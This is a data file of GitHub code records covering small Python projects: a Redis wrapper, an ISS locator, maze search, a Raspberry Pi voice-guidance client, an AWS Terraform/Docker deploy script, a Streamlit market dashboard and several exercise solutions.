+{"seq_id":"16664513025","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom typing import Any\n\nfrom redis import AuthenticationError, Redis\n\nfrom httpfpt.common.log import log\nfrom httpfpt.core import get_conf\n\n\nclass RedisDB(Redis):\n def __init__(self) -> None:\n super().__init__(\n host=get_conf.REDIS_HOST,\n port=get_conf.REDIS_PORT,\n password=get_conf.REDIS_PASSWORD,\n db=get_conf.REDIS_DATABASE,\n socket_timeout=get_conf.REDIS_TIMEOUT,\n decode_responses=True, # 转码 utf-8\n )\n self.prefix = 'httpfpt'\n\n def init(self) -> None:\n try:\n self.ping()\n except TimeoutError:\n log.error('数据库 redis 连接超时')\n except AuthenticationError:\n log.error('数据库 redis 授权认证错误')\n except Exception as e:\n log.error(f'数据库 redis 连接异常: {e}')\n else:\n log.info('数据库 redis 连接成功')\n\n def get(self, key: Any, logging: bool = True) -> Any:\n \"\"\"\n 获取 redis 数据\n\n :param key:\n :param logging:\n :return:\n \"\"\"\n data = super().get(key)\n if not data:\n if logging:\n log.warning(f'获取 redis 数据 {key} 失败, 此数据不存在')\n return data\n\n def get_prefix(self, prefix: str) -> list:\n \"\"\"\n 获取 redis 符合前缀的数据\n\n :param prefix: key 前缀\n :return:\n \"\"\"\n data = []\n for key in self.scan_iter(match=f'{prefix}*'):\n value = super().get(key)\n if value:\n data.append(value)\n return data\n\n def rset(self, key: Any, value: Any, **kwargs) -> None:\n \"\"\"\n 重置设置 redis 数据\n\n :param key:\n :param value:\n :param kwargs:\n :return:\n \"\"\"\n if super().exists(key):\n self.delete(key)\n self.set(key, value, **kwargs)\n\n def delete_prefix(self, prefix: str) -> None:\n \"\"\"\n 删除 redis 符合前缀的数据\n\n :param prefix: key 前缀\n :return:\n \"\"\"\n for key in self.scan_iter(match=f'{prefix}*'):\n self.delete(key)\n\n\nredis_client = RedisDB()\n","repo_name":"wu-clan/automated_api_pytest","sub_path":"httpfpt/db/redis_db.py","file_name":"redis_db.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"}
+{"seq_id":"4803918437","text":"from urllib.request import urlopen\nimport json\nfrom datetime import datetime\nfrom geopy.geocoders import Nominatim\n\niss_data = urlopen(\"http://api.open-notify.org/iss-now.json\") #Get data from API\n\niss_processed_data = json.loads(iss_data.read()) #Load data\n\ngeolocator = Nominatim(user_agent=\"Adam Khan's ISS Locator\") #Variable for calling Reverse Geocoding API\nlatAndLong = iss_processed_data['iss_position']['latitude'] + \", \" + iss_processed_data['iss_position']['longitude'] #Get Latitude and Longitude values for printing\nlatAndLong_no_space = iss_processed_data['iss_position']['latitude'] + \",\" + iss_processed_data['iss_position']['longitude'] #Latitude and Longitude for Google Maps link\n\nmaps_link = \"https://www.google.com/maps/search/?api=1&query=\" + latAndLong_no_space #Google Maps Link\ntry: #Try block works if there is an address (when ISS is over land)\n location = geolocator.reverse(latAndLong)\n print (\"The International Space Station is currently above: \", location.address)\n print (\"Latitude: \", iss_processed_data['iss_position']['latitude'])\n print (\"Longitude: \", iss_processed_data['iss_position']['longitude'])\n print (\"Check out the current location on Google Maps: \", maps_link)\nexcept: #Except block is called when address can not be found\n print (\"The International Space Station is currently over the ocean\")\n print (\"Latitude: \", iss_processed_data['iss_position']['latitude'])\n print (\"Longitude: \", iss_processed_data['iss_position']['longitude'])\n print (\"Check out the current location on Google Maps: \", maps_link)","repo_name":"notadamkhan/Python-ISS-Finder","sub_path":"ISSfinder.py","file_name":"ISSfinder.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"74870383780","text":"from heapq import heappop, heappush\nfrom typing import Dict, List, Tuple\n\n\ndef search(dct: Dict) -> List[Tuple[int, int]]:\n \"\"\"\n Solve the maze using uniform-cost search.\n\n Write your implementation below\n \"\"\"\n r, c = dct[\"rows\"], dct[\"cols\"]\n\n if not dct[\"goals\"]:\n return []\n\n x0, y0 = dct[\"start\"]\n map = [[0 for i in range(c)] for j in range(r)]\n\n # 0: walkable way 1: obstacles 3: goals\n for i, j in dct[\"goals\"]:\n map[i][j] = 3\n\n for i, j in dct[\"obstacles\"]:\n map[i][j] = 1\n\n # early goal check is used in the main loop\n # so start = goal case has to be checked here\n if map[x0][y0] == 3:\n return [(x0, y0)]\n\n # visited nodes stores their parent nodes in the map\n map[x0][y0] = None\n actions = [(1, 0), (0, 1), (-1, 0), (0, -1)]\n\n # heapq for frontier\n front = [(0, x0, y0)]\n\n def get_path(x: int, y: int) -> List[Tuple[int, int]]:\n path = [(x, y)]\n while map[x][y]:\n path.append(map[x][y])\n x, y = map[x][y]\n path.reverse()\n return path\n\n # when all actions have same cost, ucs is equivalent to bfs\n while front:\n co, cx, cy = heappop(front)\n for ax, ay in actions:\n x, y = cx + ax, cy + ay\n if x >= r or x < 0 or y >= c or y < 0:\n continue\n is_way = map[x][y] == 0\n is_goal = map[x][y] == 3\n if not is_way and not is_goal:\n continue\n map[x][y] = (cx, cy)\n if is_goal:\n return get_path(x, y)\n heappush(front, (co + 1, x, y))\n\n return []\n","repo_name":"IntrovertHedgehog/documents","sub_path":"study/computing/cs3243/Projects/Project 1/Code Templates/Pro1_1/A0219739N/ucs.py","file_name":"ucs.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"29850715597","text":"import sys\nfrom itertools import combinations\n\ninput = sys.stdin.readline\n\nwhile True: # break가 나올 때까지\n l = list(map(int, input().split()))\n if l[0] == 0: # 반복문 break조건\n break\n else:\n s = l[1:]\n for i in combinations(s, 6): # 주어진 수 중 6개를 뽑는 조합\n i = list(i)\n print(*i)\n print( )","repo_name":"msio900/coding_test","sub_path":"acmicpc/6603/6603.py","file_name":"6603.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"}
+{"seq_id":"26553692854","text":"#!/usr/bin/python\n##\n# Description: Implements 2d banana distribution\n##\nimport numpy as np\nfrom scipy.stats import multivariate_normal\nimport matplotlib.pyplot as plt\n\n\nclass Banana_2D(object):\n def __init__(self, mu1=0, mu2=0, sigma1=1, sigma2=1, rho=0.9, a=1.15, b=0.5):\n self.mu1 = mu1\n self.mu2 = mu2\n # cov params\n self.sigma1 = sigma1\n self.sigma2 = sigma2\n self.rho = rho\n # transform params\n self.a = a\n self.b = b\n # define gauss dist\n mean_vec = np.array([self.mu1, self.mu2])\n cov = np.array([[self.sigma1 ** 2.0, self.rho * (sigma1 * sigma2)], [self.rho * (sigma1 * sigma2), self.sigma2 ** 2.0]])\n self.rv_2d_normal = multivariate_normal(mean_vec, cov)\n\n def pdf(self, y1, y2):\n # transform coords\n x1_inv = y1 / self.a\n x2_inv = (y2 - self.b * (x1_inv ** 2.0 + self.a ** 2.0)) * self.a\n\n pos = np.dstack((x1_inv, x2_inv))\n # eval gauss pdf at tranformed coords\n return self.rv_2d_normal.pdf(pos)\n\n def ln_like(self, y):\n assert len(y) == 2\n return np.log(self.pdf(y[0], y[1]))\n\n def check_prob_lvl(self, y1, y2, pdf_lvl):\n return pdf_lvl < self.pdf(y1, y2)\n\n def transform(self, x1, x2):\n y1 = self.a * x1\n y2 = x2 / self.a + self.b * (x1 ** 2.0 + self.a ** 2.0)\n return y1, y2\n\n def inv_transform(self, y1, y2):\n x1_inv = y1 / self.a\n x2_inv = (y2 - self.b * (x1_inv ** 2.0 + self.a ** 2.0)) * self.a\n return x1_inv, x2_inv\n\n def rvs(self, n_samples):\n # sample from gauss\n samples = self.rv_2d_normal.rvs(size=n_samples)\n x1_sample, x2_sample = samples[:, 0], samples[:, 1]\n\n # move sample to transformed coords\n y1 = self.a * x1_sample\n y2 = x2_sample / self.a + self.b * (x1_sample ** 2.0 + self.a ** 2.0)\n return (y1, y2)\n\n def cdf(self, y1, y2):\n # invert transform coords\n x1_inv = y1 / self.a\n x2_inv = (y2 - self.b * (x1_inv ** 2.0 + self.a ** 2.0)) * self.a\n pos = np.dstack((x1_inv, x2_inv))\n\n # eval gauss cdf at inv transform coords\n return self.rv_2d_normal.cdf(pos)\n\n\nif __name__ == \"__main__\":\n banana = Banana_2D()\n y1, y2 = banana.rvs(10000)\n plt.figure()\n plt.scatter(y1, y2, s=2, alpha=0.3)\n plt.grid(ls='--', alpha=0.5)\n plt.savefig(\"banana_plot_samples_ex.png\")\n plt.close()\n\n plt.figure()\n y1 = np.linspace(-4, 4, 100)\n y2 = np.linspace(-2, 8, 100)\n y1, y2 = np.meshgrid(y1, y2)\n p = banana.pdf(y1, y2)\n plt.contourf(y1, y2, p)\n plt.grid(ls='--', alpha=0.5)\n plt.savefig(\"banana_plot_pdf_ex.png\")\n plt.close()\n\n plt.figure()\n y1 = np.linspace(-4, 4, 100)\n y2 = np.linspace(-2, 8, 100)\n y1, y2 = np.meshgrid(y1, y2)\n c = banana.cdf(y1, y2)\n plt.contourf(y1, y2, c)\n plt.grid(ls='--', alpha=0.5)\n plt.savefig(\"banana_plot_cdf_ex.png\")\n plt.close()\n","repo_name":"wgurecky/bipymc","sub_path":"bipymc/utils/banana_rv.py","file_name":"banana_rv.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"}
+{"seq_id":"2116465783","text":"T = 10\n\ndef solve(num, cnt):\n global a, b, result\n if cnt == b:\n result = num\n return result\n solve(num * a, cnt + 1)\n\n\nfor cnt in range(1, T + 1):\n count = int(input())\n a, b = list(map(int, input().split()))\n solve(a, 1)\n print('#' + str(count) + ' ' + str(result))","repo_name":"Jungwoo-20/Algorithm","sub_path":"SWEA/1217.py","file_name":"1217.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"6962874688","text":"#!/usr/bin/python3\nfrom socketUtils import *\nfrom imutils.video import VideoStream\nfrom parrot import *\nimport argparse\nimport re\nimport time\nimport socket\nimport pickle\nimport uuid\nimport os\n\nCLASSES = {'telephone':1, 'mug':2, 'remote control':3, 'remote':3, 'bottle':4, 'hand':5}\nclass_id = \"class_id\"\nmask = \"mask\"\nroi = \"roi\"\nscore = \"score\"\n\nclass InferenceClient:\n def __init__(self, host, port):\n self.Host = host\n self.Port = port\n self.Server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.Server.connect((host, port))\n\n def GetDetections(self, img_id, frame):\n data = EvaluationData(img_id, frame)\n\n pkg = pickle.dumps(data)\n send_msg(self.Server, pkg)\n\n data = recv_msg(self.Server)\n resp = pickle.loads(data)\n return resp\n\n def Close(self):\n self.Server.close()\n\ndef ip_with_port(arg):\n if re.match(r'\\d{1,3}[.]\\d{1,3}[.]\\d{1,3}[.]\\d{1,3}[:]\\d+', arg):\n return arg\n raise argparse.ArgumentTypeError('Server address must be follow the format \\'0.0.0.0:\\'')\n\ndef play_ready():\n os.system('aplay -q ready.wav')\n\ndef play_error():\n os.system('aplay -q error.wav')\n\ndef get_detection_centre(detection):\n return ( ((detection[roi][3] - detection[roi][1]) / 2) + detection[roi][1], ((detection[roi][2] - detection[roi][0]) / 2) + detection[roi][0] )\n\ndef get_detection_area(detection):\n return (detection[roi][3] - detection[roi][1]) * (detection[roi][2] - detection[roi][0])\n\n# construct the argument parse and parse the arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-s\", \"--server\", required=True, type=ip_with_port, help=\"IP and port of the server being used for detection. Required format - 0.0.0.0:\")\nparser.add_argument(\"-P\", \"--picamera\", action=\"store_true\", help=\"Whether or not the Raspberry Pi camera should be used\")\n\nargs = parser.parse_args()\n\nhost, port = args.server.split(':')\nport = int(port)\nclient = InferenceClient(host, port)\n\n# initialize the video stream and allow the cammera sensor to warmup\nvs = VideoStream(usePiCamera=args.picamera).start()\ntime.sleep(2.0)\n\n###\nlis = Listener()\nspkr = Speaker()\n\nspkr.Queue(\"Hello human\")\nspkr.Say(\"Give me a moment to get organized\")\n\npattern = r\"(?P(where)|(find))\\s*(is)?\\s*(the)?\\s*(?P\\w+)\"\n\ntry:\n lis.GetMicrophone('USB2.0')\nexcept MicrophoneException as e:\n print(str(e))\n spkr.Say(str(e))\n exit(1)\n\nspkr.Say(\"Ok, I'm ready\")\nwhile True:\n lis.ListenForKeyword(['raspberry'])\n play_ready()\n\n grammar_file = 'pi_commands.fsg'\n text = lis.ListenForCommand(grammar_file)\n if not text:\n spkr.Say(\"Sorry, I didn't understand\")\n continue\n\n print(text)\n match = re.match(pattern, text)\n if not match:\n play_error()\n continue\n\n thing = match.group('thing')\n print(thing)\n spkr.Say(\"You are looking for the %s\" % thing)\n\n targetClass = CLASSES[thing]\n # Guidance loop\n while True: # TODO: stop when found\n # Get frame and run it through inferece\n frame = vs.read()\n frame_size = frame.shape\n img_id = uuid.uuid4()\n detections = client.GetDetections(img_id, frame)\n\n # Get best/closer detections when multiple instances\n isHand = False\n centre = [x/2 for x in frame_size]\n print(centre)\n\n lastArea = 0\n target = []\n for detection in detections:\n if detection[class_id] == targetClass:\n area = get_detection_area(detection)\n if area > lastArea:\n lastArea = area\n target = detection\n elif detection[class_id] == CLASSES[\"hand\"]:\n centre = 
get_detection_centre(detection)\n isHand = True\n\n # If object not in sight, play error\n if not target:\n play_error()\n time.sleep(0.1)\n continue\n\n # Normalise the reference centre to (x, y); frame.shape is (height, width, channels)\n if not isHand:\n centre = (frame_size[1] / 2, frame_size[0] / 2)\n\n # Get target vector; get_detection_centre returns an (x, y) point\n target_centre = get_detection_centre(target)\n vector_hor = target_centre[0] - centre[0]\n vector_ver = target_centre[1] - centre[1]\n\n horizontal_tolerance = frame_size[1]/3\n vertical_tolerance = frame_size[0]/3\n\n # Queue up directions\n if vector_hor > horizontal_tolerance:\n spkr.Queue(\"Right\")\n elif vector_hor < -horizontal_tolerance:\n spkr.Queue(\"Left\")\n\n if vector_ver > vertical_tolerance:\n spkr.Queue(\"Down\")\n elif vector_ver < -vertical_tolerance:\n spkr.Queue(\"Up\")\n\n # Give directions\n spkr.Flush()\n time.sleep(0.1)","repo_name":"pchataignier/masters","sub_path":"raspberry_client.py","file_name":"raspberry_client.py","file_ext":"py","file_size_in_byte":4563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"14350308832","text":"def on_received_number(receivedNumber):\n if receivedNumber == 1:\n basic.pause(500)\n servos.P1.set_angle(0)\n basic.pause(500)\n servos.P1.stop()\n strip.show_color(neopixel.colors(NeoPixelColors.RED))\n basic.pause(500)\n elif receivedNumber == 2:\n servos.P1.set_angle(90)\n basic.pause(500)\n servos.P1.stop()\n strip.show_color(neopixel.colors(NeoPixelColors.BLACK))\nradio.on_received_number(on_received_number)\n\ndef on_button_pressed_a():\n radio.send_number(1)\n servos.P1.set_angle(90)\n basic.pause(500)\n servos.P1.stop()\n strip.show_color(neopixel.colors(NeoPixelColors.BLACK))\n OLED.clear()\n OLED.write_string_new_line(\"Lukka\")\n OLED.draw_line(0, 64, 128, 0)\n OLED.draw_line(128, 64, 0, 0)\ninput.on_button_pressed(Button.A, on_button_pressed_a)\n\ndef on_button_pressed_b():\n pass\ninput.on_button_pressed(Button.B, on_button_pressed_b)\n\nstrip: neopixel.Strip = None\nradio.set_group(1)\nled.enable(False)\nstrip = neopixel.create(DigitalPin.P2, 1, NeoPixelMode.RGB)\nOLED.init(128, 64)\n\ndef on_forever():\n if smarthome.read_noise(AnalogPin.P3) > 80:\n radio.send_number(2)\n servos.P1.set_angle(2)\n basic.pause(500)\n servos.P1.stop()\n strip.show_color(neopixel.colors(NeoPixelColors.RED))\n OLED.clear()\n OLED.write_string_new_line(\"Open\")\nbasic.forever(on_forever)\n","repo_name":"NewtonVoss/modul2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"32705819727","text":"import pathlib\nimport docker\nimport argparse\nimport logging\nimport jmespath\nimport json\nimport boto3\nimport base64\nimport sys\n\n\nfrom python_terraform import *\n\nfrom typing import List\n\n# Log to file & stdout\nlogging.basicConfig(filename=\"nginx-system.log\", level=logging.INFO)\nlogging.getLogger().addHandler(logging.StreamHandler())\n\n# GLABOLs\nCWD: pathlib.Path = pathlib.Path().expanduser().resolve()\nDOCKER_PATH: pathlib.Path = CWD.joinpath('nginx-image')\nSERVICE_PATH: pathlib.Path = CWD.joinpath('service')\nDOCKER_CLIENT = docker.from_env()\n\n\ndef create_docker_images_and_push(profile: str, region: str, do_push: bool = False) -> None:\n \"\"\"\n Create images\n \"\"\"\n # Build the current Image\n logging.info(\"Building the Docker Container\")\n DOCKER_CLIENT.images.build(\n path=str(DOCKER_PATH),\n tag=\"nginx-container:latest\",\n quiet=False\n )\n\n # search for a tf state file\n terraform = [p for p in SERVICE_PATH.rglob(\"*.tfstate\")]\n\n if not terraform:\n logging.info(\"Can't get repo name form tfstate file\")\n sys.exit(1)\n\n # load tf state file\n with terraform[0].open(mode='r') as fp:\n tf_state_data = json.load(fp)\n\n # find the repository_url\n list_of_repository_url: List[str] = jmespath.search(\n \"resources[?type=='aws_ecr_repository'].instances | [0][*].attributes.repository_url\",\n tf_state_data\n )\n # check we we're able to get the repo\n if list_of_repository_url:\n repository_url: str = list_of_repository_url.pop(0)\n logging.info(f\"info: repo name is {repository_url}\")\n\n # 1) re-tag with epository_url\n current_image = DOCKER_CLIENT.images.get(\"nginx-container:latest\")\n current_image.tag(f\"{repository_url}:latest\")\n\n # 2) push image to aws\n if do_push:\n sesson = boto3.Session(profile_name=profile, region_name=region)\n ecr_client = sesson.client('ecr')\n\n token = ecr_client.get_authorization_token()\n\n registry_auth = token.get('authorizationData')\n # get auth token for ecr\n if registry_auth:\n try:\n username, password = base64.b64decode(registry_auth[0]['authorizationToken']).decode().split(':')\n repository_name = registry_auth[0]['proxyEndpoint']\n except IndexError as e:\n logging.error(f\"Error - {e}\")\n\n # loging and push the image\n DOCKER_CLIENT.login(username, password, registry=repository_name)\n DOCKER_CLIENT.images.push(f\"{repository_url}:latest\")\n\n\ndef create_terrafrom(profile: str, region: str) -> None:\n \"\"\"\n Create AWS structure from Terraform infrastructure\n :return: AWS Object\n \"\"\"\n logging.info(\"Creating Terraform layout (may take a while...)\")\n terraform = Terraform(working_dir=SERVICE_PATH)\n\n try:\n terraform.cmd(\"init\")\n except FileNotFoundError:\n logging.error(\"Terraform was not found in PATH. 
Please do so.\")\n sys.exit(1)\n\n terraform.cmd(f\"workspace new tstack\")\n terraform.cmd(f\"workspace select tstack\")\n return_code, _, stderr = terraform.cmd(\n \"apply\",\n vars=f\"profile={profile}\",\n auto_approve=IsFlagged\n )\n\n logging.info(f\"Terraform Exit Code: {return_code}\")\n\n if return_code == 0:\n logging.info(\"new stack created\")\n else:\n if \"ExpiredToken\" in stderr:\n logging.critical(\n \"***token expired, please renew and try again ***\"\n )\n else:\n logging.critical(\n \"*** Ensure aws profile exists***\"\n )\n sys.exit(1)\n\n print(terraform.output())\n\n\ndef clean_up(profile: str, region: str) -> None:\n \"\"\"\n remove everything created and docker images\n :param stack_id: Stack ID to delete\n \"\"\"\n try:\n terraform = Terraform(working_dir=SERVICE_PATH)\n terraform.cmd(\"init\")\n terraform.cmd(f\"workspace select tstack\")\n except (TerraformCommandError, KeyError):\n logging.error(\"workspace doesn't exist\")\n sys.exit(-1)\n\n return_code, stdout, stderr = terraform.cmd(\n \"destroy\",\n var={\n \"profile\": profile,\n \"region\": region\n },\n auto_approve=IsFlagged,\n )\n logging.info(stdout)\n logging.error(stderr)\n\n # docker remove\n if return_code == 0:\n logging.info(f\"ECS Stack tstack destroy complete\")\n \n\ndef parse_args() -> argparse.Namespace:\n \"\"\"\n Parse input args from the user into system args\n :return: Namespace of options\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-p\",\n \"--profile\",\n type=str,\n required=True,\n default=\"default\",\n help=\"The aws profile you're going to use\"\n )\n parser.add_argument(\n \"-t\",\n \"--type\",\n type=str,\n default=\"run\",\n choices=[\"image\"],\n required=False,\n help=\"\"\"options of to do\n run - will build terraform\n delete - will destroy stacks and rmi docker images\n image - will build the image\n \"\"\"\n )\n parser.add_argument(\n \"-r\",\n \"--region\",\n type=str,\n default=\"us-east-1\",\n required=False,\n help=\"This is the aws region you are using. default is us-east-1\"\n )\n\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n \n # simple two state run\n if args.type == \"run\":\n # apply terrafrom\n create_terrafrom(args.profile, args.region)\n elif args.type == \"image\":\n # build docker image and push to ecr\n create_docker_images_and_push(args.profile, args.region)\n elif args.type == \"clean\":\n clean_up(args.profile, args.region)\n else:\n logging.error(\"Error - invalid selection\")\n","repo_name":"jchamish/nginx-ha-ipaddress","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"26654328357","text":"import pandas as pd\r\nimport streamlit as st\r\nimport numpy as np\r\n\r\n\r\ndef get_avg_price(market_metrics):\r\n avg_prices = market_metrics.groupby('market_id',as_index=False)['median_sale_price'].mean()\r\n return avg_prices\r\n\r\n\r\ndef max_score(score,mid,maxscore,maxid):\r\n st.header(\"Market Hotness Calculator\")\r\n st.text(\"Graph for the Avg sales price and their corresponding market_id\")\r\n st.line_chart(pd.DataFrame(score,mid))\r\n st.text(f\"The max sales {maxscore} has been done by the market id {maxid}\")\r\n st.write(\"\")\r\n st.write(\"\")\r\n st.write(\"\")\r\n\r\n\r\n\r\ndef avg_sales(score,mid,city,mdi):\r\n\r\n st.text(\"The below score is based on Average of the Sales after buying it\")\r\n try:\r\n market_id=st.number_input('Enter the Market ID to get the score')\r\n ind=mid.index(int(market_id))\r\n cind=mdi.index(int(market_id))\r\n st.text(f\"The score is: {score[ind]} and the city where it belongs is {city[cind]}\")\r\n except:\r\n st.warning(\"Sorry, Enter correct Market id\")\r\n\r\n\r\nmarket=pd.read_csv(\"market.csv\")\r\nmarket_metrics=pd.read_csv(\"market_metrics.csv\")\r\nmarket_id=market_metrics.groupby('market_id').count().reset_index()\r\n\r\n\r\n# Removing null values from market dataframe\r\nmarket_nan = market.isnull().sum().sum()\r\nmarket=market.dropna()\r\n\r\n\r\n# Removing the null values and filling missing data present in the market metrics dataframe\r\nmetric_nan = market_metrics['median_list_price_psqft'].isnull().sum().sum()\r\npending_housedata=market_metrics[market_metrics[\"days_to_pending\"].isna() & market_metrics[\"days_to_sell\"].isna()]\r\npending_housedata=pending_housedata[pending_housedata[\"sold_homes_count\"]<5]\r\npending_housedata=pending_housedata[pending_housedata[\"new_listings_count\"]<10]\r\nindices=list(pending_housedata.index)\r\nmetrics=market_metrics.drop(indices)\r\nmetrics.days_to_pending.fillna(metrics.days_to_sell, inplace=True)\r\nmetrics.days_to_sell.fillna(metrics.days_to_pending, inplace=True)\r\n\r\n\r\n# This block is for calculating the avg price score\r\navg_price=get_avg_price(metrics)\r\nprice=pd.DataFrame(avg_price)\r\nscore=list(price[\"median_sale_price\"])\r\nmid=list(price[\"market_id\"])\r\n\r\ncity=list(market['city'])\r\nmdi=list(market['id'])\r\n\r\nmaxscore=max(score)\r\nind=score.index(maxscore)\r\nmaxind=mid[ind]\r\nmax_score(score,mid,maxscore,maxind)\r\navg_sales(score,mid,city,mdi)\r\n\r\n\r\n# This block is for calculating the days of sold\r\n\r\ndef get_avg_day(market_metrics):\r\n avg_prices = market_metrics.groupby('market_id',as_index=False)['days_to_sell'].mean()\r\n return avg_prices\r\n\r\n\r\ndef average_day(score2,mid2,city2,mdi2):\r\n\r\n st.text(\"The below score is based on Average of the the days to sell\")\r\n try:\r\n marid=st.number_input('Enter the Market ID to get the score')\r\n ind=mid2.index(int(marid))\r\n cind=mdi2.index(int(marid))\r\n st.text(f\"The score is: {score2[ind]} and the city where it belongs is {city2[cind]}\")\r\n except:\r\n st.warning(\"Sorry, Enter correct Market id\")\r\n\r\n\r\ndef day_score(score2,mid2,maxscore2,maxid2):\r\n st.write(\"\")\r\n st.write(\"\")\r\n st.write(\"\")\r\n st.text(\"Graph for the Avg days to sell and their corresponding market_id\")\r\n st.line_chart(pd.DataFrame(score2,mid2))\r\n st.text(f\"The max sales {maxscore2} has been done by the market id {maxid2}\")\r\n st.write(\"\")\r\n st.write(\"\")\r\n 
st.write(\"\")\r\n\r\n\r\navg_day=get_avg_day(metrics)\r\nprice2=pd.DataFrame(avg_day)\r\nscore2=list(price2[\"days_to_sell\"])\r\nmid2=list(price2[\"market_id\"])\r\n\r\ncity2=list(market['city'])\r\nmdi2=list(market['id'])\r\n\r\nmaxscore2=max(score2)\r\nind2=score2.index(maxscore2)\r\nmaxind2=mid2[ind2]\r\nday_score(score2,mid2,maxscore2,maxind2)\r\naverage_day(score2,mid2,city2,mdi2)\r\n\r\n#print(score2)\r\n","repo_name":"NavinAananthan/ZeroDown-Hackathon","sub_path":"algo.py","file_name":"algo.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"35469810871","text":"import csv\nfrom excep import excep as ex\nfrom user_interface import user_interface as console\n\n\ndef read_data(path): #Функция, читает данные из файла в список\n \n ex.read_file_except(path)\n with open(path, \"r\") as file:\n reader = csv.reader(file)\n data_list = []\n for row in reader:\n data_list.append(row)\n return data_list\n\t\t\t\n\ndef show_all(path): #Функция, выводит все заметки из указанного .csv файла.\n\n\tlist_ = read_data(path)\n\t\n\tprint('''\\t ID || Имя || Вид ''')\n\tprint('=' * 50)\n\tfor note in list_:\n\t\tprint(f'\\t {note[0]}. || {note[1]} || {note[2]} \\n \\n Список изученных команд: {note[3]}' )\n\tprint('=' * 50)\n\n\ndef selected_filter():\n while (True):\n console.choise_search_filter()\n k = ex.action('пункт')\n if k == \"1\": \n print('-'*50)\n print('Вы выбрали \"По идентификатору\"')\n print('-'*50)\n return 0\n # show_selected_note(path, 0)\n\n elif k == \"2\": \n print('-'*50)\n print('Вы выбрали \"По имени\"')\n print('-'*50)\n return 1\n # show_selected_note(path, 1)\n \n elif k == \"3\": \n print('-'*50)\n print('Вы выбрали \"По виду\"')\n print('-'*50)\n return 2\n # show_selected_note(path, 2) \n\n elif k == \"4\":\n print('-'*50)\n print(\"Производиться выход в главное меню\")\n print('-'*50)\n break\n \n else:\n print('-'*50)\n print(\"Вы ввели неправильные данные\")\n print('-'*50)\n\ndef show_selected_note(path, x):\n\t'''\n\tФункция, выводит информацию о заметках по указанным данным\n\t'''\n \n\tlist_note = read_data(path)\n\tsearch_filter = ex.check_input_string('Введите параметры поиска: ')\n\tfor note in list_note:\n\t\tif search_filter == note[x] in note:\n\t\t\tindex = list_note.index(note)\n\t\t\tprint(list_note[index])\n \n\n \n ","repo_name":"Marassanovad/FinalProject","sub_path":"python/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"25763521533","text":"# Write a Python program to create a dictionary of phone numbers and names of five persons. Display the cointents of the dictionary in alphabetical order of names \nph={}\ni=0\nwhile(i<5):\n key = input() \n value = input() \n ph[key] = value\n i=i+1\n\n\n \nsorted_keys = ph.items()\nnew_values = sorted(sorted_keys)\nprint(new_values)","repo_name":"JK432/Dictionary-of-phone-numbers","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"32146170496","text":"import os\nimport cv2\nfrom tqdm import tqdm\nfrom pathlib import Path\n\n\ndef vid2frames(vid_file, save_folder, prefix=\"{:03d}.jpg\"):\n vidcap = cv2.VideoCapture(vid_file)\n success, image = vidcap.read()\n count = 1\n success = True\n while success:\n cv2.imwrite(os.path.join(save_folder, prefix.format(count)),\n image) # save frame as JPEG file\n count += 1\n success, image = vidcap.read()\n\n\nif __name__ == '__main__':\n video_files = sorted(Path(\"dataset/videos/videos\").glob(\"*.mp4\"))\n save_top_folder = Path(\"dataset/videos/frames/\")\n\n if not save_top_folder.exists():\n os.mkdir(str(save_top_folder))\n\n for video_file in tqdm(video_files, desc=\"Number of videos\"):\n save_vid_folder = save_top_folder / video_file.stem\n if not save_vid_folder.exists():\n os.mkdir(save_vid_folder)\n\n if not any(save_vid_folder.iterdir()):\n vid2frames(str(video_file), str(save_vid_folder))\n","repo_name":"hgupta01/Weather_Intensity_Recognition","sub_path":"varg_video2frames.py","file_name":"varg_video2frames.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"34525147398","text":"from collections import deque\n\nn = int(input())\ns = deque([input() for _ in range(n)])\nhistory = {}\n\nfor i in range(n):\n query = s.popleft()\n if(query in history):\n print(query + \"(\" + str(history[query] + 1) +\")\" )\n history[query]+=1\n else:\n print(query)\n history[query]=0\n # print(history)\n","repo_name":"kibutan/Atcoder","sub_path":"ABC261/C - NewFolder(1).py","file_name":"C - NewFolder(1).py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
